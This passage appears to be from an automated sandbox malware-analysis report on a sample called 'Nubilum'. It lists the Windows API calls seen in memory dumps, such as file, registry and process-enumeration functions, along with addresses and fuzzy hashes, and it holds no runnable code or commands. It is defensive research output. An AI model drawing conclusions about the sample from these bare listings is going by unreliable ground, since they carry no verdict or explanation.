                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$PointerRead
                          • String ID:
                          • API String ID: 3154509469-0
                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                          APIs
                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itowmemset
                          • String ID:
                          • API String ID: 4232544981-0
                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                          APIs
                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                          APIs
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$FileModuleName
                          • String ID:
                          • API String ID: 3859505661-0
                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                          APIs
                          • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                          APIs
                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                          • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                          • Opcode Fuzzy Hash: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                          APIs
                          • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                          • Opcode Fuzzy Hash: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                          APIs
                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                          APIs
                          • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: EnumNamesResource
                          • String ID:
                          • API String ID: 3334572018-0
                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                          APIs
                          • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                          APIs
                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: c04c0335ba9332e1d7a11915a44761c0e0363b535bb0446cda30cb285f4c8f6b
                          • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                          • Opcode Fuzzy Hash: c04c0335ba9332e1d7a11915a44761c0e0363b535bb0446cda30cb285f4c8f6b
                          • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                          • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                          APIs
                          • memset.MSVCRT ref: 004095FC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                          • String ID:
                          • API String ID: 3655998216-0
                          • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                          • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                          APIs
                          • memset.MSVCRT ref: 00445426
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                          • String ID:
                          • API String ID: 1828521557-0
                          • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                          • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                          APIs
                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                          • memset.MSVCRT ref: 0042BFC0
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: a0780bb49d8a07aeac5707b5a6201decdf5b3787da807124ae81a49ee348ef3f
